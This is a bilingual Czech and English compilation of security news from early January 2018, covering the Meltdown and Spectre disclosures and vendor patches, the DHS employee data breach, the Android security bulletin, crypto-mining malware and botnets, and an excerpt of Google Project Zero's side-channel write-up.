Toto rozdělení mimo jiné vysvětluje, proč se zároveň objevují zprávy, které ve vztahu k hardwaru Intelu hovoří o zcela minimálním výkonnostním dopadu záplat stejně jako o možných výkonnostních propadů dosahujících v krajních případech i nižších desítek procent. Obojí se totiž týká řešení jiného bodu.


První bod, jak je uvedeno, je už v řadě operačních systémů zazáplatován; došlo k tomu ještě před zveřejněním informace o možném zneužití této slabiny, aby nebyla využita nějakými protispolečensky smýšlejícími živly.

Body dva a tři si bude muset pořešit především Intel a v případě bodu dva je otázkou také ARM. Bod tři je podle dosavadních informací skutečně jen specialitou Intelu a je otázkou, jak jej zvládne Intel zazáplatovat, tedy především s ohledem na to, jaký výkonnostní dopad záplata přinese.

Samotná ARM se vyjádřila velmi stručně: „Tato metoda vyžaduje lokální běh škodlivého kódu a může vyústit v přístup k datům v privilegované paměti. Našich Cortex-M procesorů, které převažují v úsporných IoT zařízeních, se to netýká.“ Nezodpovězena zůstává otázka: „A co ostatních řad?“

Co se týče způsobu distribuce záplat, očekává se, že u všech tří bodů bude řešení zahrnuto do aktualizací operačního systému, přičemž u bodu dva bude nutný i zásah do firmwaru.

Pokud jde o názvosloví, je v případě popsaných slabin obtížné najít takovou terminologii, která by byla krátká a navíc zcela korektní. Výstižnější než „bug procesoru“ je totiž označení „postup, kterým lze zneužít moderní architektonický prvek procesorů“. Nelze totiž naprosto jednoznačně říct ani to, že jde o bug procesoru, ani to, že jde o bug operačního systému. Každý má svůj podíl. Jaká názorné srovnání můžeme brát kapesní krádeže v městské hromadné dopravě. Když MHD neexistovala, neexistovaly ani krádeže v MHD. Můžeme ale jen proto tvrdit, že krádeže MHD jsou „bug MHD“? Opět jde o záležitost, která je částečně o MHD, ale částečně také o systému. Lze ji řešit na úrovni jednoho (řidič každého cestující po nástupu sváže), lze ji vyřešit druhým (vyhlásí se zákaz vstupu do MHD s čímkoli odcizitelným), ale optimální bude řešení, na kterém se budou podílet obě strany takovým způsobem, který nepřinese příliš citelné zásahy do efektivity a komfortu fungování.

Kritičtěji by ovšem bylo možné hodnotit konkrétní slabinu procesorů Intelu (Rogue Data Cache Load), k níž se poměrně ostře vyjádřil Linus Torvalds. Konstatoval, že kompetentní procesorový inženýr by zajistil, aby se spekulativní provádění isntrukcí nemohlo odehrávat napříč ochrannými doménami a tím by byl problém vyřešen. Nelichotivě se také vyjádřil k přístupu Intelu, který jedná ve stylu „není to problém jen našich procesorů“, přestože nejzásadnější a experimentálně prokázaná slabina se týká právě jich.


Z materiálů Intelu

Pokud jde o možné dopady řešení ve vztahu ke stávajícímu hardwaru, objevují se různá čísla i různé názory. Prozatím nemá smysl předjímat, jak situace dopadne. Konkrétně ve vztahu k procesorům Intelu panuje podle zdrojů webu The Verge názor, že procesory Intelu starší než Skylake budou co do výkonu penalizovány výrazněji; Skylake a novější zanedbatelně.

Protože tato bezpečností slabina je podle dosavadních zjištění zneužitelná jen lokálně (nikoli po síti) a riziko spočívá v možném získání šifrovacích klíčů a hesel, je otázkou, zda záplaty pro starší procesory, kde by mohlo dojít k vyššímu výkonnostnímu propadu, budou plošné, nebo se rozhodnutí ponechá na libovůli uživatele. Běžného domácího uživatele s Haswellem či Broadwellem asi hypotetické riziko místního útoku bude trápit méně, než jistý výkonnostní propad ve hrách a aplikacích.


Intel Patches CPUs Against Meltdown, Spectre Exploits
5.1.2018 securityweek
Exploit
Intel has been working with its partners to release software and firmware updates that should protect systems against the recently disclosed CPU attacks. The company expects patches to become available for a majority of its newer products by the end of next week.

Researchers this week disclosed the details of Spectre and Meltdown, two new side-channel attacks targeting CPUs from Intel, AMD and ARM. The attacks, which leverage three different flaws, can be used to bypass memory isolation mechanisms and gain access to sensitive data, including passwords, photos, documents, and emails. Experts have warned that malicious actors may soon start to remotely exploit the Spectre vulnerabilities in targeted or mass attacks.

AMD has insisted that there is a “near zero risk” to its customers and ARM says only a few of its Cortex processors are impacted.

Intel informed customers on Thursday that system manufacturers have been provided firmware and software updates that address Spectre and Meltdown for processors launched in the last five years – experts believe nearly every Intel processor made since 1995 is impacted. It will now be up to system manufacturers to distribute the patches.

“By the end of next week, Intel expects to have issued updates for more than 90 percent of processor products introduced within the past five years,” Intel said.

In response to concerns that mitigations for the Spectre and Meltdown vulnerabilities can introduce performance penalties of as much as 30 percent, Intel pointed out that average users will not notice any difference.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact,” Intel said.

The company cited Apple, Microsoft, Amazon and Google, all of which said the mitigations did not create any noticeable performance issues.

The best protection against these attacks is the use of kernel page table isolation (KPTI), a hardening technique designed by a team of researchers at the Graz University of Technology in Austria to isolate kernel space from user space memory. Google, whose researchers independently found the flaws, also developed a novel mitigation named Retpoline.

Microsoft, Apple, Google, Red Hat, VMware and other major tech firms have already started releasing software updates and workarounds to resolve the vulnerabilities.

Intel was hit the hardest by Spectre and Meltdown and the company’s stock lost 6 percent in value shortly after the disclosure. The company’s CEO, Brian Krzanich, sold all the stock he was legally allowed to, worth roughly $24 million, just before the news broke, which has raised insider trading concerns. Intel claims Krzanich had been planning on selling stock for months, but Intel has reportedly known about the vulnerabilities since April 2017.


Google Apps Script Allowed Hackers to Automate Malware Downloads
5.1.2018 securityweek
Virus
Researchers at Proofpoint discovered recently that Google Apps Script could have been abused by malicious hackers to automatically download malware hosted on Google Drive to targeted devices.

Google Apps Script is a JavaScript-based scripting language that allows developers to build web applications and automate tasks. Experts noticed that the service could have been leveraged to deliver malware by using simple triggers, such as onOpen or onEdit.

In an attack scenario described by Proofpoint, attackers uploaded a piece of malware to Google Drive and created a public link to it. They then used Google Docs to send the link to the targeted users. Once victims attempted to edit the Google Docs file, the Apps Script triggers would cause the malware to be automatically downloaded to their devices. Researchers said attackers could have used social engineering to convince the target to execute the malware.

Google has implemented new restrictions for simple triggers in an effort to block malware and phishing attacks triggered by opening a document.

While there is no evidence that this method has been exploited in the wild, malicious actors abusing Google Apps Script is not unheard of. A cybercrime group using the infamous Carbanak malware at one point leveraged the service for command and control (C&C) communications.

“SaaS platforms remain a ‘Wild West’ for threat actors and defenders alike. New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms. At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms,” explained Maor Bin, security research lead of Threat Systems Products at Proofpoint.

“This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use ‘good for bad’: making use of legitimate features for malicious purposes,” he added.

A few months ago, Google announced the introduction of new warnings for potentially risky web apps and Apps Scripts.


Čeští uživatelé těží kryptoměny, aniž by to tušili

5.1.2018 SecurityWorld Incidenty
Eset v pravidelné měsíční statistice internetových hrozeb za prosinec odhalil skokana roku: javový skript CoinMiner.

Potenciálně nechtěné aplikace, tzv. PUA, jsou programy či kódy, které nepředstavují přímé ohrožení osobního počítače uživatele, přesto je doporučeno se jim vyhnout. Právě do této kategorie spadá JS/CoinMiner, škodlivý kód, který používají zločinci pro těžbu kryptoměn s využítím výpočetního výkonu uživatele. Za uplynulý měsíc představovala tato aplikace nejčastější internetovou hrozbou, kterou v České republice zachytila společnost Eset.

„Nástup škodlivého kódu JS/CoinMiner byl velmi rychlý a zejména v samém závěru posledního měsíce loňského roku jeho aktivity výrazně zesílily,“ říká Miroslav Dvořák, technický ředitel společnosti Eset. Za celý prosinec 2017 představoval JS/CoinMiner třetinu všech detekcí kybernetických hrozeb. Hrozba „těžebního“ trojanu ale nepolevila ani po Novém roce, ba právě naopak. „První lednové dny dosahoval podíl JS/CoinMiner na detekcích téměř 50 procent,“ konstatuje Miroslav Dvořák.

JS/CoinMiner přitom existuje ve dvou variantách. Tou častější je javový skript, který běží na pozadí internetových stránek a využívá výpočetního výkonu uživatele k těžení kryptoměn. Ta druhá, méně častá, se chová jako trojan a zneužívá exploitu EternalBlue SMB vyvinutého americkou Národní bezpečnostní agenturou NSA. Do zařízení proniká prostřednictvím neaktualizovaného operačního systému.

Jakmile jej infikuje, stáhne do něj škodlivý skript pro Windows Management Instrumentation (WMI), který standardně používají správci počítačových systémů ke vzdálené správě velkého počtu počítačů. „JS/CoinMiner ale zneužívá tento systém pro vytvoření trvalých zadních vrátek a zabezpečení automatického spouštění vždy, když dojde ke spuštění operačního systému,“ vysvětluje Dvořák.

Doporučené nástroje ochrany jsou kromě spolehlivého bezpečnostního softwaru i pravidelné aktualizace operačního systému Windows. Špionážní software EternalBlue totiž zneužíval zranitelnosti SMBv1, kterou Microsoft opravil krátce po zveřejnění této hrozby. Využívaly jí i další trojany, které loni v létě pomáhaly šířit nechvalně proslulý ransomware WannaCry. „Určitě není ani od věci zakázat problémový protokol SMBv1, pokud ho nepoužíváte,“ radí Miroslav Dvořák.

Druhou nejčetnější internetovou hrozbou v Česku byl během prosince loňského roku trojan JS/Redirector, který automaticky přesměrovává internetový prohlížeč napadeného zařízení na škodlivé stránky, odkud uživatel může stáhnout do svého počítače další druhy malwaru. Oproti listopadu, kdy představoval nejčastěji detekovaný malware, však jeho podíl na detekcích nepatrně vzrostl z 3,91 na 4,83 procenta. Třetím nejčastěji zachyceným škodlivým kódem byl downloader JS/TrojanDownloader.Nemucod s podílem 2,8 procenta.


247,000 DHS current and former federal employees affected by a privacy incident
4.1.2017 securityaffairs Incindent

A privacy incident suffered by the Department of Homeland Security (DHS) exposed data related to 247,167 current and former federal employees.
A data breach suffered by the Department of Homeland Security exposed data related to 247,167 current and former federal employees that were employed by the Agency in 2014.

The data breach affected a database used by the DHS Office of the Inspector General (OIG) that was stored in the Department of Homeland Security OIG Case Management System.

“On January 3, 2018, select DHS employees received notification letters that they may have been impacted by a privacy incident related to the DHS Office of Inspector General (OIG) Case Management System. The privacy incident did not stem from a cyber-attack by external actors, and the evidence indicates that affected individual’s personal information was not the primary target of the unauthorized transfer of data.” reads the announcement published by the DHS.

Exposed data includes employee names, Social Security numbers, birth dates, positions, grades, and duty stations.

The incident also affected a second group of individuals (i.e., subjects, witnesses, and complainants) associated with Department of Homeland Security OIG investigations from 2002 through 2014 (the “Investigative Data”).

The data leak was the result of an unauthorized copy of the DHS OIG investigative case management system that was in the possession of a former DHS OIG employee.

The copy was discovered as part of an ongoing criminal investigation being conducted by Department of Homeland Security OIG and the U.S. Attorney’s Office

The data breach was discovered on May 10, 2017, as part of an ongoing criminal investigation conducted by OIG and the U.S. Attorney’s Office.

The Department of Homeland Security sent notification letters to affected individuals, it is also implementing additional security measured to limit access to such kind of information.

All individuals potentially affected by the incident are being offered 18 months of free credit monitoring and identity protection services.

“Department of Homeland Security is implementing additional security precautions to limit which individuals have access to this information and will better identify unusual access patterns. ” continues the Department of Homeland Security.

“We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network,”


Android Security Bulletin for January 2018, tech giant fixes multiple Critical flaws
4.1.2017 securityaffairs Android

Google patched five Critical bugs and 33 High severity flaws as part of the Android Security Bulletin for January 2018.
The tech giant addressed 38 Android security vulnerabilities, 20 as part of the 2018-01-01 security patch level and 18 in the 2018-01-05 security patch level.

The 2018-01-01 security patch level fixed four Critical remote code execution issue and 16 High risk elevation of privilege and denial of service flaws.

The most severe vulnerability in Android runtime, tracked as CVE-2017-13176, could be exploited by a remote attacker to bypass user interaction requirements in order to gain access to additional permissions.

A Critical remote code execution flaw was fixed in System, the company also addressed one High risk denial of service vulnerability and two High severity elevation of privilege vulnerabilities.

The security updates fixed 15 vulnerabilities issues in Media framework, the most severe one could be exploited by an attacker using a specially crafted malicious file to execute arbitrary code within the context of a privileged process.

The 2018-01-05 security patch level addressed just one Critical flaw in the Qualcomm components, it could allow a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

The 2018-01-05 security patch level also fixed 1 Critical issue and 6 High severity vulnerabilities in Qualcomm closed-source components.

The patch level addressed High risk elevation of privilege flaws in LG components, MediaTek components, Media framework, and NVIDIA components.

The security patch level addressed one information disclosure bug in Kernel components, and three High severity elevation of privilege.

The tech giant also fixed resolved 46 vulnerabilities in Google devices as part of the Pixel / Nexus Security Bulletin—January 2018.

High severity flaws only affected older Android versions, meanwhile, most of the issues were rated Moderate severity.

The affected components included Framework (1 vulnerability), Media framework (16 vulnerabilities), System (1 flaw), Broadcom components (1 issue), HTC components (1 flaw), Kernel components (7 bugs), MediaTek components (1 issue), and Qualcomm components (18 vulnerabilities).


Meltdown and Spectre attacks affect almost any processor, including Intel, ARM, AMD ones
4.1.2017 securityaffairs
Vulnerebility

The Meltdown and Spectre attacks could allow attackers to steal sensitive data which is currently processed on the computer.
Almost every modern processor is vulnerable to the ‘memory leaking’ flaws, this has emerged from technical analysis triggered after the announcement of vulnerabilities in Intel Chips.

White hackers from Google Project Zero have disclosed the vulnerabilities that potentially impact all major CPUs, including the ones manufactured by AMD, ARM, and Intel.

The expert devised two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

“A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.” reads the description of ‘speculative execution’ provided by Google hackers.

The experts explained that it is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound and can lead to information disclosure.

intel chip

The Meltdown Attack

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

“Meltdown is a related microarchitectural attack which exploits out-of-order execution in order to leak the target’s physical memory.” reads the paper on the Spectre attack.

“Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.”

The Meltdown exploits the speculative execution to breach the isolation between user applications and the operating system, in this way any application can access all system memory.

Almost any computer is currently vulnerable to Meltdown attack.

The Spectre Attack

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack is hard to mitigate because it requires changes to processor architecture in order to solve it.
The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems. The Spectre attack works on almost every system, including desktops, laptops, cloud servers, as well as smartphones.

“In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.” continues the paper.

“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”

The main vendors have rushed to provide security patches to protect their systems from these attacks.

Windows — Microsoft has issued an out-of-band patch update for Windows 10, the other versions will be fixed with the next Patch Tuesday planned for January 9, 2018
MacOS — Apple fixed most of these security holes in macOS High Sierra 10.13.2 last month.
Linux — Linux kernel developers have also released patches by implementing kernel page-table isolation (KPTI) to isolate kernel memory.
Android — Google has released security patches for Pixel/Nexus users as part of the Android January security patch update.


Hackers Expected to Remotely Exploit CPU Vulnerabilities
4.1.2018 securityweek
Vulnerebility

Security experts believe hackers will soon start to remotely exploit the recently disclosed vulnerabilities affecting Intel, AMD and ARM processors, if they haven’t done so already.

Researchers disclosed on Wednesday the details of Spectre and Meltdown, two new attack methods targeting CPUs. The attacks leverage three different flaws and they can be used to bypass memory isolation mechanisms and gain access to sensitive data, including passwords, photos, documents, and emails.

The affected CPUs are present in billions of products, including PCs and smartphones, and attacks can also be launched against cloud environments.

The best protection against these attacks is the use of kernel page table isolation (KPTI) and affected vendors have already started releasing patches and workarounds.

While the main attack vector is via local access (e.g. a piece of malware installed on the targeted machine), researchers say remote attacks via JavaScript are also possible, particularly in the case of Spectre.

Researchers have developed a proof-of-concept (PoC) for Google Chrome that uses JavaScript to exploit Spectre and read private memory from the process in which it runs.

Spectre attack JavaScript PoC

Mozilla has conducted internal experiments and determined that these techniques can be used “from Web content to read private information between different origins.” While the issue is still under investigation, the organization has decided to implement some partial protections in Firefox 57.

Google pointed out that attacks are possible via both JavaScript and WebAssembly. The company informed customers that current versions of Chrome include a feature named Site Isolation that can be manually enabled to prevent attacks. Chrome 64, which is scheduled for release on January 23, will contain mitigations in the V8 JavaScript engine. Other hardening measures will be included in future versions, but the tech giant warned that they may have a negative impact on performance.

Microsoft has also confirmed that attacks can be launched via JavaScript code running in the browser. The company has released updates for its Edge and Internet Explorer web browsers to mitigate the vulnerabilities.

Since a JavaScript PoC is available, experts believe it’s only a matter of time until malicious actors start exploiting the flaws remotely. While some say state-sponsored actors are most likely to leverage these attacks, others point out that mass exploitation is also possible, particularly via the ads served by websites.

That is why some experts have advised users to disable JavaScript in their browser and install ad blockers.

Mike Buckbee, security engineer at Varonis, noted that while exploitation via the browser might not give attackers access to files, they are still likely to find valuable data in the memory, including SSH keys, security tokens and passwords.

While affected vendors say there is no evidence that Spectre and Meltdown have been exploited prior to their disclosure, the researchers who discovered the vulnerabilities warn that attacks are not easy to detect.

Researcher Jake Williams said, “It's reasonable to assume that most nation states had Spectre and Meltdown before public announcement. If by some miracle they weren't already using these, they will be now.”

Bryce Boland, Asia Pacific Chief Technology Officer at FireEye, agrees. “Nation state hackers typically use these types of vulnerabilities to develop new attack tools, and that's likely in this case,” he said.

Sam Curry, Chief Security Officer at Cybereason, also believes sophisticated actors will likely exploit the flaws, if they haven’t done so already.

“This isn't yet doom and gloom but the tension will rise. And don't be surprised if it comes to light that a nation state is already using this or if a catalyst in the form of hack or research further heats this up and makes it a more clear-and-present risk in 2018.


247,000 DHS Employees Affected by Data Breach
4.1.2018 securityweek Incindent
Information on nearly a quarter million Department of Homeland Security (DHS) employees was exposed as part of an "unauthorized transfer of data", the DHS announced.

The privacy incident involved a database used by the DHS Office of the Inspector General (OIG) which was stored in the DHS OIG Case Management System.

The incident impacted approximately 247,167 current and former federal employees that were employed by DHS in 2014. The exposed Personally identifiable information (PII) of these individuals includes names, Social Security numbers, birth dates, positions, grades, and duty stations.

Individuals (both DHS employees and non-DHS employees) associated with DHS OIG investigations from 2002 through 2014 (including subjects, witnesses, and complainants) were also affected by the incident, the DHS said.

The PII associated with these individuals varies depending on the documentation and evidence collected for a given case and could include names, social security numbers, alien registration numbers, dates of birth, email addresses, phone numbers, addresses, and personal information provided in interviews with DHS OIG investigative agents.

The data breach wasn’t the result of an external attack, the DHS claims. The leaked data was found in an unauthorized copy of the DHS OIG investigative case management system that was in the possession of a former DHS OIG employee.

The data breach was discovered on May 10, 2017, as part of an ongoing criminal investigation conducted by DHS OIG and the U.S. Attorney’s Office.

“The privacy incident did not stem from a cyber-attack by external actors, and the evidence indicates that affected individual’s personal information was not the primary target of the unauthorized exfiltration,” DHS explained.

The Department said that notification letters were sent to select DHS employees to inform them that they might have been impacted. DHS also says that it conducted a thorough privacy investigation, a forensic analysis of the compromised data, and assessed the risk to affected individuals before making the incident public.

Following the incident, the DHS says it is implementing additional security precautions to limit access to the type of information that was released in this incident and to better identify unusual access patterns.

“We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network,” DHS notes.

Additional information for the affected individuals is available in an announcement and FAQ published on Jan 3.


Tech Giants Address Critical CPU Vulnerabilities
4.1.2018 securityweek
Vulnerebility
Several major tech companies have started releasing patches and mitigations for the recently disclosed Meltdown and Spectre vulnerabilities affecting CPUs from Intel, AMD and ARM.

The flaws exploited by the Meltdown and Spectre attacks, tracked as CVE-2017-5715, CVE-2017-5753 and CVE-2017-5754, allow malicious applications to bypass memory isolation mechanisms and access data as it’s being processed. This can include passwords, photos, documents, emails, and data from instant messaging apps.

Billions of PCs, smartphones and cloud instances are affected, and while there is no evidence of attacks in the wild, researchers said exploitation attempts are unlikely to be detected.

Meltdown

Attacks can be prevented using kernel page table isolation (KPTI), a hardening technique designed to improve security by isolating kernel from user memory. However, the mitigation can introduce performance penalties of up to 30 percent for affected processors.

Researchers had initially planned on disclosing the security holes on January 9, but disclosure was moved up due to media reports and speculation surrounding the topic. Affected tech companies have already started informing users about the risks and the availability of patches and mitigations.

Intel, AMD and ARM

Initial reports claimed only Intel CPUs were affected by the vulnerabilities. While Intel was hit the hardest, some of the flaws affect AMD and ARM as well.

Intel has informed customers that it’s working with manufacturers and operating system vendors to address the issues. The company also reassured customers that performance penalties will not affect regular computer users and will be mitigated over time.

Spectre

AMD is apparently only affected by the Spectre vulnerabilities (CVE-2017-5753 and CVE-2017-5715), and the company claims the risk to its processors is “near zero” thanks to their architecture.

In the case of ARM, the company says only its Cortex-A75 processors are affected by all three vulnerabilities. Cortex R7, R8, A8, A9, A15, A17, A57, A72 and A73 processors are vulnerable to Meltdown attacks and affected by the CVE-2017-5715 Spectre flaw. Other existing products and future processors are not affected, the company said.

ARM has provided kernel patches for Linux users and advised customers using Android and other OSs to check for updates from their respective vendor.

Google

Google has patched the vulnerabilities in its Cloud platform, but some users may need to manually perform some tasks.

“Google Compute Engine used VM Live Migration technology to perform host system and hypervisor updates with no user impact, no forced maintenance windows, and no mass reboots required. However, all guest operating systems and versions must be patched to protect against this new class of attack regardless of where those systems run,” Google said.

The company has informed Android users that while the risk of attacks is small, the latest Android security updates do provide additional protection against Spectre and Meltdown.

Microsoft

Microsoft started implementing protections in Windows a few months ago. The company informed customers on Wednesday that it released several updates to help mitigate the vulnerabilities in Windows client and server products. It has also released a tool designed to tell customers if protections are enabled.

Microsoft is also working to ensure that customers of its Azure cloud platform are not vulnerable to Meltdown and Spectre attacks.

“The majority of Azure infrastructure has already been updated to address this vulnerability. Some aspects of Azure are still being updated and require a reboot of customer VMs for the security update to take effect,” the company said.

Apple

Apple has yet to make any public statements, but security expert Alex Ionescu reported that version 10.13.2 of macOS High Sierra, which Apple released on December 6, does fix the vulnerabilities.

Xen, Amazon Web Services (AWS), DigitalOcean, Rackspace

The Xen Project said systems running any version of the Xen hypervisor are affected. Due to the accelerated disclosure, the organization has not had time to create patches, and mitigations are available for only one of the security holes.

AWS, which uses Xen, told customers, “All but a small single-digit percentage of instances across the Amazon EC2 fleet are already protected. The remaining ones will be completed in the next several hours, with associated instance maintenance notifications.”

Rackspace, which also uses Xen, is currently investigating the issue. DigitalOcean has also launched an investigation, but the company has blamed Intel’s embargo for not determining potential impact sooner.

Mozilla

Mozilla has conducted some internal experiments and found that it is possible to use techniques similar to Meltdown and Spectre from web content to read private date between different origins. The full extent of the issue has yet to be determined, but some partial mitigations have already been added to Firefox

Red Hat

Red Hat has classified the vulnerabilities as important and it has already developed kernel updates for affected versions of Red Hat Enterprise Linux.

“We are working with our customers and partners to make these updates available, along with the information our customers need to quickly secure their physical systems, virtual images, and container-based deployments,” said Chris Robinson, manager of Product Security Assurance at Red Hat.

nVIDIA

nVIDIA said its GPU hardware does not appear to be impacted by Meltdown and Spectre, but some system-on-a-chip (SoC) products using ARM CPUs are vulnerable. The company is working on identifying affected products and preparing mitigations.


Crypto-Miner Botnet Spreads over SSH
4.1.2018 securityweek BotNet
A recently discovered Linux crypto-miner botnet spreading over the SSH protocol is based on the Python scripting language, which makes it difficult to detect, F5 Networks has discovered.

Dubbed PyCryptoMiner, the botnet is using Pastebin to receive new command and control server (C&C) assignments when the original C&C isn’t available. Under active development, the botnet recently added scanner functionality hunting for vulnerable JBoss servers (exploiting CVE-2017-12149), F5 says.

Designed to mine for Monero, a highly anonymous crypto-currency, the botnet is estimated to have generated the equivalent of approximately $46,000 as of late December.

PyCryptoMiner isn’t the only botnet targeting online Linux systems, but because of its scripting language-based nature, the malware is more evasive and be easily obfuscated. Furthermore, it is executed by a legitimate binary, F5's researchers discovered.

The botnet spreads by attempting to guess the SSH login credentials of target Linux machines. If the credentials are successfully discovered, the attacking bot deploys a simple base64-encoded spearhead Python script designed to connect to the C&C server to download and execute additional Python code.

The second-stage code is the main bot controller, which registers a cron job on the infected machine to create persistency.

The original spearhead bash script also collects information on the infected device, including Host/DNS name, OS name and architecture, number of CPUs, and CPU usage. It also checks whether the machine has been already infected and whether the bot is used for crypto-mining or scanning.

The bot then sends a report with the collected information to the C&C, which responds with task details. Tasks include arbitrary commands to be executed, update, identifier so the C&C can synchronize botnet results, and time interval to poll the C&C. The bot sends an output of the executed task to the C&C.

In mid-December, the botnet was updated with code to scan for vulnerable JBoss servers, in an attempt to exploit CVE-2017-12149, a vulnerability disclosed several months ago.

“The list of the targets to scan is controlled by the C&C server, while the bot has a separate thread that polls the C&C server for new targets. The server responds with a Class C IP range to scan but could also provide a single IP address,” the researchers reveal.

The botnet uses two pool addresses that show approximately 94 and 64 Monero, with a value of around $60,000. However, the researchers are uncertain how much profit the threat actor behind the malware has made overall.

Unlike other malware that has the C&C server address hardcoded, which causes bots to become unreachable when the server is taken down, the botnet uses Pastebin to publish an alternate C&C server address if the original one is unreachable.

According to F5, with all C&C servers of the botnet inaccessible at this moment, all newly infected bots are idle, polling for the attacker’s Pastebin.com page, which could be updated at any time.

The page allowed researchers to determine that the botnet might have been active since August 2017, and that the resource had been viewed 177,987 times at the time of the investigation. However, the researchers couldn’t determine the exact size of the botnet, as a single bot could periodically ask the resource if the C&C server is down.

Looking at other resources created by the same actor, who uses the moniker “WHATHAPPEN”, the researchers discovered 235 email addresses and more than 36,000 domains associated with them. The registrant has been involved in scams, gambling, and adult services since 2012.

“Our research is still ongoing while we hunt for more missing pieces of this puzzle, such as the “scanner node” component and additional C&C servers, if there are any. We are also waiting to see whether the current C&C server will come back to life,” F5 notes.


Andromeda Botnet to Die Slow, Painful Death After Takedown
4.1.2018 securityweek BotNet
Following a takedown operation in early December 2017, the Andromeda botnet is expected to slowly disappear from the threat landscape, ESET says.

Also known as Wauchos or Gamarue, the botnet has been around since at least September 2011 and lived through five major versions over the years. The Andromeda malware was detected or blocked on an average of around 1.1 million machines every month over the six months leading to the takedown.

The botnet was mainly used for stealing credentials and to download and install additional malware onto compromised systems. Thus, systems infected with Andromeda would likely have other threats installed on them as well, ESET says.

Some of the threats usually distributed via Andromeda included Kasidet, also known as Neutrino bot, which can launch distributed denial-of-service (DDoS) attacks, and Kelihos and Lethic, which are notorious spambots known for their involvement in massive junk mail campaigns. It was also used for the distribution of the Dridex banking Trojan and point-of-sale (PoS) malware GamaPoS.

Andromeda was distributed through various methods, including social media, instant messaging, removable media, spam, drive-by downloads, and exploit kits. Because it didn’t conduct targeted attacks, the malware could infect any computer if the user clicked on malicious links.

Since there were no obvious signs to alert the user on the infection, the botnet managed to remain hidden and compromise a large number of systems. Featuring a modular design, the botnet could get additional capabilities through plugins such as a keylogger, a form grabber, and a rootkit.

ESET Senior Malware Researcher Jean-Ian Boutin, who was involved in the takedown operation, explains that the botnet’s numerous features and continuous development made it appealing to cybercriminals interested in using it. Thus, Andromeda was able to survive for a long period of time and to also become a prevalent threat.

At the time of Andromeda’s takedown, security researchers identified 464 distinct botnets, 80 associated malware families, and 1,214 domains and IP addresses of the botnet’s command and control (C&C) servers.

The takedown operation, a joint effort from the FBI, the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust, and private-sector partners, built on information gathered during the shutdown of a large criminal network known as Avalanche.

According to Boutin, investigators started gathering information and evidence in 2015 and needed a lot of time to get everything ready for a law enforcement operation. Following the takedown, authorities seized control of Andromeda’s C&C servers and the botnet is expected to slowly disappear.

“It will probably slowly disappear as remediation is under way. For this type of long-lived botnet, it is very hard to clean all the systems that have been compromised by Wauchos, but as long as the good guys are in control of the C&C servers, at least no new harm can be done to those compromised PCs,” Boutin says.


Reading privileged memory with a side-channel
4.1.2017 Google Projet Zero
Vulnerebility blog

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

Variant 1: bounds check bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

Spectre (variants 1 and 2)
Meltdown (variant 3)

During the course of our research, we developed the following proofs of concept (PoCs):

A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

